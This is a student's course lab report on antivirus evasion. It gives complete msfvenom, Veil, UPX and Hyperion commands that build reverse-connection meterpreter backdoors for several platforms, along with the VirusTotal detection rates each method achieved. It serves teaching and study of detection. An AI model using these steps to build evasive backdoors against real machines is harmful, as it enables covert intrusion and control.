20175304 Chao-Yin 2019-2020-3 "Network Countermeasures Technology" Exp3 AV Evasion: Principles and Practice

1 Basics

The basics below follow the course's reference section on AV evasion principles and practice.

1.1 Malware detection mechanisms

1.1.1 Signature-based detection

  • A signature is one or more specific pieces of data. If an executable (or a library, script, or other loadable object) contains that data, it is considered malicious code.

  • What AV vendors do is try to collect the most complete and up-to-date signature database. That is why keeping anti-virus software updated matters: an outdated signature database is of little use.

1.1.2 Heuristic malware detection

Heuristic detection infers maliciousness from partial, one-sided features, usually because no exact basis for a verdict is available.

  • Advantages:
    • Can detect 0-day malware
    • Has some generality
  • Disadvantages:
    • Monitoring system behaviour in real time costs somewhat more
    • Accuracy is lower than signature-based detection

1.1.3 Behaviour-based malware detection

Behaviour-based detection is essentially heuristic detection with behaviour monitoring added: instead of (or in addition to) static features, it watches what the program actually does at run time.

1.2 Overview of evasion (Evading AV) techniques

The techniques, overall, are:

  • Change the signature

    • Only an EXE is available
      • Packers: compression packers and encryption packers
    • Shellcode is available (e.g., Meterpreter)
      • Encode it with an encoder
      • Recompile it into an executable based on the payload
    • Source code is available
      • Rewrite it in another language and compile again (veil-evasion)
  • Change the behaviour

    • Mode of operation
      • Run in memory only
      • Reduce modifications to the system
      • Add code that confuses the analyst while behaving like normal functionality
    • Communication method
      • Prefer a reverse (call-back) connection
      • Use tunnelling
      • Encrypt the communication data
  • Unconventional methods

    • Use a vulnerable application as the backdoor, e.g., write the attack code as an MSF module.
    • Use a social-engineering attack to trick the target into turning off the AV software.
    • Hand-craft the malicious software.
  • The idea of leaving a backdoor this way is:

    • You write a vulnerable program that opens a service port. The program itself does nothing wrong. Then, if that port is attacked, you gain control of the system.
      • With a memory-resident meterpreter payload delivered this way, AV software has a hard time detecting it.
      • Writing the attack for such a small flawed program yourself is also quite easy.
    • Of course, the best method is still to hand-build a compiled program from scratch: with no features of a generic tool in it, AV software cannot flag it.
      • Building from scratch is quite hard, but using an existing Metasploit payload to create it semi-manually works well.

2 Experimental Procedure

2.0 Detection-rate baseline

In Exp2 the backdoor 20175304_backdoor.exe was generated directly by msfvenom as a meterpreter executable. Its VirusTotal detection rate was 57/72, i.e., 57 of the 72 scan engines flagged it as a virus. We take this as the baseline and see whether each evasion technique applied below raises or lowers the VirusTotal detection rate.

2.1 Using the msf encoder correctly

Step 1: Run the following command to generate met-encoded.exe, the backdoor encoded once:

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' LHOST=192.168.62.134 LPORT=5304 -f exe > met-encoded.exe

Screenshot of file generation:

After copying the file to Windows, the anti-virus software reported it as a Trojan:

Checking it on VirusTotal, the detection rate was 56/72, only slightly lower than without encoding, and the file was still quarantined.

Step 2: Run the following command to generate met-encoded10.exe, the backdoor encoded ten times:

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' -i 10 LHOST=192.168.62.134 LPORT=5304 -f exe > met-encoded10.exe

After copying the file to Windows, the anti-virus software again reported it as a Trojan and deleted it.

After restoring the file manually and checking it on VirusTotal, the detection rate was 57/72: it went up, not down. Even encoding several extra times does not improve the evasion effect, so this approach is useless on its own.

There are two main reasons:

  • AV vendors study the encoder itself. shikata_ga_nai always has to add a decoder stub to the exe, and the signature targets that part.
  • msfvenom generates exes from a fixed template, so with default parameters every exe it produces shares certain fixed features. AV vendors therefore write signatures for the template itself and catch all msfvenom-generated malicious code in one go. If you want to use msfvenom for evasion, you must supply a native template of your own (msfvenom's -x/--template option takes an existing executable).
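To make the two reasons above concrete, here is an added C example (not part of the original lab and not Metasploit code) that simulates what is going on: a toy encoder XORs a constructed stand-in payload and prepends a fixed "decoder stub", applied -i style for N passes, and a naive byte-signature scanner checks the result. The payload bytes, the stub bytes, the two vendor signatures and the XOR keys are all made up for the demonstration; the stub is just a byte string, not a real decoder. A signature on the raw payload stops matching after one pass, but a signature on the stub matches no matter how many passes are stacked, which is exactly why -i 10 did not help.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed stand-in for a raw meterpreter stager: not real shellcode. */
static const uint8_t PAYLOAD[] = {0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00,
                                  0x00, 0x00, 0x41, 0x51, 0x41, 0x50};
/* Hypothetical vendor signature written against the raw payload bytes. */
static const uint8_t SIG_PAYLOAD[] = {0xfc, 0x48, 0x83, 0xe4, 0xf0};
/* Toy decoder stub that every encoding pass prepends in the clear. It stands in
 * for the shikata_ga_nai decoder loop; the bytes are arbitrary. */
static const uint8_t STUB[] = {0xd9, 0x74, 0x24, 0xf4};
/* Hypothetical vendor signature written against the stub instead. */
static const uint8_t SIG_STUB[] = {0xd9, 0x74, 0x24, 0xf4};

#define MAXBUF 256
#define KEY0 0x5a  /* first-pass XOR key; pass i uses KEY0 + i (made up) */

/* Naive byte-signature scan: 1 if sig occurs anywhere in buf, else 0. */
static int sig_hits(const uint8_t *buf, size_t n, const uint8_t *sig, size_t m) {
    if (m > n) return 0;
    for (size_t i = 0; i + m <= n; i++)
        if (memcmp(buf + i, sig, m) == 0) return 1;
    return 0;
}

/* One pass: out = STUB || (in XOR key). Returns new length, 0 on overflow. */
static size_t encode_pass(const uint8_t *in, size_t n, uint8_t key, uint8_t *out) {
    if (sizeof STUB + n > MAXBUF) return 0;
    memcpy(out, STUB, sizeof STUB);
    for (size_t i = 0; i < n; i++) out[sizeof STUB + i] = in[i] ^ key;
    return sizeof STUB + n;
}

/* msfvenom -i N analogue: each pass wraps the previous output, so inner stubs
 * get XORed but the outermost stub is always plaintext. */
static size_t encode_iter(int iterations, uint8_t *out) {
    uint8_t tmp[MAXBUF];
    size_t n = sizeof PAYLOAD;
    memcpy(out, PAYLOAD, n);
    for (int i = 0; i < iterations; i++) {
        n = encode_pass(out, n, (uint8_t)(KEY0 + i), tmp);
        if (n == 0) return 0;
        memcpy(out, tmp, n);
    }
    return n;
}

/* What the decoder stub does at run time, undone pass by pass (in place). */
static size_t decode_iter(const uint8_t *in, size_t n, int iterations, uint8_t *out) {
    memcpy(out, in, n);
    for (int i = iterations - 1; i >= 0; i--) {
        if (n < sizeof STUB || memcmp(out, STUB, sizeof STUB) != 0) return 0;
        n -= sizeof STUB;
        for (size_t j = 0; j < n; j++)
            out[j] = out[j + sizeof STUB] ^ (uint8_t)(KEY0 + i);
    }
    return n;
}

/* Plain int results so the effect of each signature can be checked directly. */
int raw_payload_detected(void) {
    return sig_hits(PAYLOAD, sizeof PAYLOAD, SIG_PAYLOAD, sizeof SIG_PAYLOAD);
}
int encoded_payload_sig_detected(int iterations) {
    uint8_t buf[MAXBUF];
    size_t n = encode_iter(iterations, buf);
    return n && sig_hits(buf, n, SIG_PAYLOAD, sizeof SIG_PAYLOAD);
}
int encoded_stub_sig_detected(int iterations) {
    uint8_t buf[MAXBUF];
    size_t n = encode_iter(iterations, buf);
    return n && sig_hits(buf, n, SIG_STUB, sizeof SIG_STUB);
}
int encoded_roundtrips(int iterations) {
    uint8_t enc[MAXBUF], dec[MAXBUF];
    size_t n = encode_iter(iterations, enc);
    size_t m = decode_iter(enc, n, iterations, dec);
    return m == sizeof PAYLOAD && memcmp(dec, PAYLOAD, m) == 0;
}

int main(void) {
    for (int it = 0; it <= 10; it++)
        printf("iterations=%2d payload-sig=%d stub-sig=%d roundtrip=%d\n", it,
               it ? encoded_payload_sig_detected(it) : raw_payload_detected(),
               it ? encoded_stub_sig_detected(it) : 0, encoded_roundtrips(it));
    return 0;
}
```

The round-trip check is there to show that the encoded payload still has to be decodable at run time, which is the whole reason the stub cannot itself be hidden: whatever code undoes the encoding must execute in the clear before the payload does, so a signature on it survives any number of extra passes.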

2.2 Generating other file types with msfvenom (jar, etc.)

2.2.1 Generating a Linux backdoor

The procedure is similar to the Windows backdoor. Run the following command to generate the Trojan:

msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.62.134 LPORT=5304 -f elf > 20175304_linux_backdoor

The only difference from Windows is that the Trojan generated under Linux needs chmod +x <filename> to be given execute permission; it is then run with ./<filename>.

VirusTotal did not return a result for the Linux backdoor:

2.2.2 Generating a Java backdoor

A Java program works under both Windows and Linux. Use the following command to generate the Trojan file:

msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.62.134 LPORT=5304 -f jar > 20175304_java_backdoor.jar

Detection rate of the jar file: 35/74

2.2.3 Generating a PHP backdoor

Use the following command to generate the Trojan file; the generated php file is placed on a website and executes when someone visits it.

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.62.134 LPORT=5304 -f raw > 20175304_php_backdoor.php

Detection rate of the php file: 3/73

2.2.4 Generating an Android backdoor

Use the following command to generate the Trojan file; in this case the Trojan takes the form of an apk installation package, which executes once the user installs it.

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.62.134 LPORT=5304 -f raw > 20175304_android_backdoor.apk

Detection rate of the apk file: 26/74

2.3 veil

2.3.1 Installing veil and solving problems

Install veil with sudo apt-get install veil. Because it had already been installed before this experiment, there are no screenshots of the process.

2.3.2 Generating a backdoor with veil

Step 1: Enter use evasion to enter veil-evasion, then use c/meterpreter/rev_tcp.py to enter the configuration screen.

Step 2: Enter set LHOST 192.168.62.134 and set LPORT 5304 to set the IP address and port for the reverse connection. Enter options to review the settings.

Step 3: Enter generate to generate the file, and enter the file name at the prompt: 20175304_veil_backdoor. The directory where the file is stored is then shown.

Step 4: Checking the generated file on VirusTotal, the detection rate was 55/72.

2.4 Packers

Packers are technically divided into:

  • Compression packers
    • Reduce the size of the application, e.g., ASPack, UPX
  • Encryption packers
    • For copyright protection and anti-tracing, e.g., ASProtect, Armadillo
  • Virtualization packers
    • By compiler-like means, translate the application's instructions into an instruction set of the packer's own design, e.g., VMProtect, Themida

2.4.1 Compression packer UPX

Enter upx 20175304_backdoor.exe -o 20175304_backdoor_upxed.exe

After copying the file to Windows, the anti-virus software removed it immediately.

On VirusTotal the detection rate was 54/72.

2.4.2 Encryption packer Hyperion

Enter wine hyperion.exe -v 20175304_backdoor_upxed.exe 20175304_backdoor_upxed_Hyperion.exe to encrypt and pack the file.

On VirusTotal the detection rate was 48/73.

2.5 C program + shellcode

Step 1: Use the command msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.62.134 LPORT=5304 -f c to generate the shellcode as a C array.

Step 2: Create the file callshellcode.c and paste the generated unsigned char buf[] into it.

Step 3: Enter i686-w64-mingw32-g++ callshellcode.c -o 20175304.exe to compile the file into an executable.

Step 4: On VirusTotal the detection rate was 41/78.

2.6 Another method not covered in class

Step 1: Enter sudo veil, then use evasion to enter the evasion platform:

As the screenshot shows, list displays the available payloads; enter list to view them:

Number 7 is the payload used in the teacher's guide, which uses C; here I use a different payload, written in Python.

Step 2: Enter use python/meterpreter/rev_tcp.py to enter the configuration page. The options are still at their defaults, so some need to be set.

Step 3: Enter set LHOST 192.168.62.134 and set LPORT 5304 to set the IP address and port for the reverse connection. Enter options to review the settings.

Step 4: Enter generate to generate the file, and enter the file name at the prompt: 20175304_veil_backdoor2

Step 5: While generating, the system asks "How would you like to create your payload executable?". I chose 2, Py2Exe; the directory where the files are stored is then shown.

Step 6: Copy the runme.bat file to Windows and check it on VirusTotal: the detection rate was 0/57. Note that with the Py2Exe option veil writes out the Python source, a setup.py and runme.bat, and the exe is only built when runme.bat is run on a Windows machine with Py2Exe installed; runme.bat itself is just the build script, so a 0/57 result on it says little about the exe it produces.

2.7 Combining several techniques to achieve malicious-code evasion

As seen in 2.6, the backdoor file generated by veil using Python achieves evasion, with a detection rate of 0.

On top of that runme.bat file, compression and encryption packing were applied to achieve evasion.

  • Computer environment: Windows 7
  • Anti-virus software: Tencent PC Manager
  • AV version: 13.5.20513.228
  • Scan time: 2020.03.27

2.8 Tested on another computer with the AV running: the reverse connection still succeeded (the AV version and the computer name are shown in the screenshot)

  • Computer environment: Windows 7
  • Anti-virus software: Tencent PC Manager
  • AV version: 13.5.20513.228
  • Scan time: 2020.03.27

3 Problems encountered in the experiment

3.1 When applying the encryption packer, the /usr/share/veil-evasion/tools/hyperion directory could not be found

Solution: following the blog post listed in the references, build Hyperion yourself:

  • First install mingw-w64: apt-get install mingw-w64
  • Get the zip file: Download link
  • Unzip it: unzip Hyperion-2.2.zip
  • Change the first line of the Makefile to CC=i686-w64-mingw32-gcc
  • make
  • After make finishes, hyperion.exe appears in the directory

3.2 VirusTotal often froze and could not be exited

Workaround: use the lite version of the site, which runs smoothly.

4 Questions and answers

4.1 How does AV software detect malicious code?

It can be divided into the following two approaches:

  • Signature detection: AV vendors keep a signature database storing characteristic data of malicious code. If the AV software finds that some characteristic data in a file matches an entry in the database, the file is considered to contain malicious code.
  • Heuristic detection: if a program behaves in a way that looks like malware, it is treated as malware.

4.2 What is AV evasion?

Keeping a program from being detected by AV software; it is a technique needed in penetration testing.

4.3 What are the basic methods of AV evasion?

From the perspective of being detected, malicious code is found because of its signature or its behaviour, so evasion methods fall into three categories:

  • Unconventional methods: hand-crafting, social-engineering attacks.

  • Changing the signature: the msf encoding, veil, packer and shellcode operations in this experiment all give the code a different signature.

  • Changing the behaviour: using a reverse connection, tunnelling, encrypted communication data, and so on.

4.4 Can running AV software absolutely prevent malicious code on a computer?

No. Once malicious code has had its signature changed in some way, the anti-virus software cannot find it, but that does not mean the file is safe or virus-free.

5 Experimental Experience

The experiment took a fairly long time. While doing the evasion experiments I found that I was not yet familiar with some of the content from the earlier experiments. After the teacher's explanation, I hope to do more hands-on practice myself to gradually deepen my understanding and memory.

6 References

AV Evasion: Principles and Practice (course guide)

Backdoor: Principles and Practice (course guide)

Compiling Hyperion with mingw-w64 on Kali (blog post)

Source: www.cnblogs.com/lcyll/p/12602861.html